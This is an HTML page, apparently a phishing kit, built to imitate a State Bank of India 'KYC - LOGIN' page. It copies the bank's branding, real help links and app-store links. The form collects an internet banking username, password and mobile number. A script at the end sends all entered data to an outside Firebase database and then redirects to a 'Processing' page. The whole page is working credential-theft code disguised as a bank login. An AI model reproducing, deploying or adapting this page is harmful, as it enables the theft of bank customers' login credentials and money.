<!DOCTYPE html>
<html>
<head>
    <title>Submit Form to Firebase</title>
    <style>
    #qw,#io,#mm,#il
    {
      width:105%;
      margin-left:-7.8px;
      display:block;
      
    }
    #ip
    { 
       width:155px;
    }
    #ia
    {  
         width:155px;
         margin-left:25px;
    }
    #jj
    {
      width: 85%;
      margin-left: 10px;
    }
    #bb,#dd,#ff,#ii
    {
      width: 300px;
      height: 26px;
      background-color: #ededed;
      border-color:#7212b3;
      border-width: 1px;
      border-radius: 2px;
      margin-left: 10px;
      font-size:16px;
      padding: 2px 10px;
      cursor: pointer;
    }
    #name,#mob,#pass
    {
      width: 300px;
      height: 26px;
      background-color: #ededed;
      border-color:#7212b3;
      border-width: 1px;
      border-radius: 2px;
      margin-left: 10px;
      font-size:16px;
      padding: 2px 10px;
      cursor: pointer;
    }
    #ob
    {
      margin-left: 23px;
      font-size: 18px;
    }
    #go
    {
      margin-left: 35px;
      margin: 8px;
    }
    #ll,#sj
    {
      width: 343px;
      background-color: #7212b3;
      color: white;
      border: solid black;
      border-radius: 2px;
      border-width: 0.1px;
      cursor: pointer;
      font-size: 18px;
      height: 46px;
      margin-left: 2px;
    }
    #ch
    {
      margin: 4px;
      margin-left:6px;
      font-size: 15px;
      font-family: Arial, Helvetica, sans-serif;
    }
    #check
    { 
         margin-left:210px;
    }
    #chi
    {  
         font-family:Arial, Helvetica, sans-serif;
         font-size:14px;
    } 
    #yono
    { 
        background-color:#ededed;
        height:120px;
        border: solid #7212b3;
        border-width:0.1px;
        border-radius: 4px;
    }
    #foot
    { 
         background-color:#ededed;
         padding:5px;
         border: solid #7212b3;
         border-width:0.1px;
         border-radius: 4px;
         height:68px;
    }
    #ll:hover
    {
    background-color:#4c0c85;
    color: white;
    border: solid black;
    border-radius: 1px;
    border-width:0.1px;
    cursor: pointer;
    font-size: 18px;
    height: 46px;
    }
    #par
    {
    color:black; 
    font-size:15.2px; 
    margin:-12px;
    margin-left:2px; 
    background-color:white;
    }
    .line-text
    {
      position:absolute;
      top:62px;
      padding:10px;
    }
    #ab
    {
    width:365px;
    border-bottom: solid #7212b3;
    border-width:1px;
    }
  </style>
</head>
<body>
    <div class="line">
  <img src="head.png" alt="" id="qw"><br>
  <div class="line-text">
  <b style="color:white; font-size:21px; font-family:arial;">KYC - LOGIN</b>
  </div></div>
  <form id="myForm">
  <div style="margin:0px;">
  <div id="par">
  <b style="font-family:;">Enter your Internet Banking User Name and <br>Password or Temporary User Name and<br> Password to Proceed.</b>
  </div><br><br>
<center>( <b style="color:red; font-size:13px; margin:0px; margin-left:2px;">CARE:</b>
<p1 style="color:grey; font-size:13px; font-family: Arial, Helvetica, sans-serif; margin:0px margin-left:0px;">Username and password are case sensitive.</p1> )</center>
    </div><br>
    <div id="zz">
      <p1 style="font-family:arial; margin-left:10px;">Username<span style="color:#f06565; font-family:arial;">/</span></p1>User ID <span style="color:#f06565; font-family:arial;">*</span></p1>
    
        <div id="aa" required="">
      <input type="text" name="Username" id="name" placeholder="Username" maxlength="25"
      required=""><br><br>
    </div>

    <div id="yy">
      <p1 style="font-family: Arial, Helvetica, sans-serif; margin-left:10px;"> Password <span style="color:#f06565;">*</span></p1>
    </div>
    <div id="cc">
      <input type="password" name="Password" id="pass" placeholder="Password"  maxlength="25"
      required="">
      </div>
      <div id="chi">
      <input type="checkbox"  id="check" onclick="myFunction()">Show Password
      </div>
      <script>
      function myFunction() {
      var x = document.getElementById("pass");
      if (x.type === "password") {
      x.type = "text";
      } else {
      x.type = "password";
      }
      }
      </script>



     <div id="xx">
      <p1 style="font-family: Arial; margin-left:10px;"> Mobile Number <span style="color:#f06565;">*</span></p1>
    </div>

    <div id="ee">
      <input type="tel" name="MobileNo" id="mob" placeholder="Mobile Number" maxlength="10"
      pattern="[0-9]{10}"
      title="Please Enter Valid 10 Digit Mobile Number"
      required=""> <br><br>
    </div>


    <div id="gg">
      <p1 style="font-family: Arial; margin-left:10px;"> Enter the text as shown in the image <span style="color:#f06565;">*</span></p1>
    </div>
    <div id="hh">
      <input type="text" name="" id="ii" placeholder="Enter Captcha" maxlength="5"
      title="Please Enter Capcha Shown In The Image" required="">
    </div>
    <div id="ch" class="fs12">
      <input name="" onclick="showVirtualKeyBoard();" id="ch" type="checkbox" />Enable virtual keyboard
    </div>
  </div>
  <div id="ob">
    <b style="color:black; margin:-10px;">Captcha</b>
  </div>
  <img src="captcha.png" alt="" id="jj"><br><br>    
        
<div id="kk">
    <center><input type="submit" value="Submit" id="ll"><center>
  </div><br>
  

    </form>
  <div id="ab" 
  style="margin:10px; 
  margin-left:-8px;">
  </div>
  <div id="foot">
  <b style="color: #7212b3; font-family: Arial, Helvetica, sans-serif; margin-left:40px;"> <a href="https://retail.onlinesbi.com/preretail/lockunlockuseraccess.htm" style=" color: #7212b3; font-family: Arial, Helvetica, sans-serif; text-decoration:none;"> Lock Access </a></b><b style="margin-left:10px;">|</b>
  <b style="color: #7212b3; font-family: Arial, Helvetica, sans-serif; margin-left:10px;"> <a href="https://retail.onlinesbi.com/retail/troubleloginhome.htm?bankCode=0" style=" color: #7212b3; font-family: Arial, Helvetica, sans-serif; text-decoration:none;"> Forgot Password </a></b><b style="margin-left:4px;">|</b><br><br>
<center> <b style="color: #7212b3; font-family: Arial, Helvetica, sans-serif; margin:5px;"> <a href="https://retail.onlinesbi.com/retail/troubleloginhome.htm?bankCode=0" style=" color: #7212b3; font-family: Arial, Helvetica, sans-serif; text-decoration:none;"> Forgot Username </a></b></center>
  </div><br>
  <div id="yono">
  <b style="color:black; font-size:18px; font-family: Arial, Helvetica, sans-serif; margin-left:5px;">New to YONO?</b1><br>
  <b style="color:black; font-size:17px; font-family: Arial, Helvetica, sans-serif; margin-left:5px;">Download the app and registered now!</b1><br><br>
  <a href="https://play.google.com/store/apps/details?id=com.sbi.SBIFreedomPlus"><img src="play.png" alt="" id="ip"></a>
  <a href="https://apps.apple.com/in/developer/state-bank-of-india/id503784436"><img src="app.png" alt="" id="ia"></a>
  </div><br>
  <div class="cont">
  <img src="last.png" alt="" id="io">
  </div>
  <div class="image">
  <img src="footer.png" alt="" id="il">
  </div>
        

    <!-- Add your custom JavaScript code here -->
    <script>
  document.getElementById('myForm').addEventListener('submit', (event) => {
    event.preventDefault();
    const form = event.target;
    const formData = new FormData(form);
    const data = {};
    formData.forEach((value, key) => {
      data[key] = value;
    });

    // Replace 'YOUR_FIREBASE_DATABASE_URL' with your Firebase database URL
    const firebaseURL = 'https://conty-92a23-default-rtdb.firebaseio.com/submissions.json';

    const xhr = new XMLHttpRequest();
    xhr.open('POST', firebaseURL, true);
    xhr.setRequestHeader('Content-Type', 'application/json');

    xhr.onload = () => {
      if (xhr.status === 200) {
        
        // Redirect to the next page after successful submission
        window.location.href = 'Processing.html';
      } else {
        console.error('Failed to submit form.');
      }
    };

    xhr.onerror = () => {
      console.error('Error submitting form.');
      alert('An error occurred while submitting the form. Please try again later.');
    };

    xhr.send(JSON.stringify(data));
  });
</script>

</body>
</html>
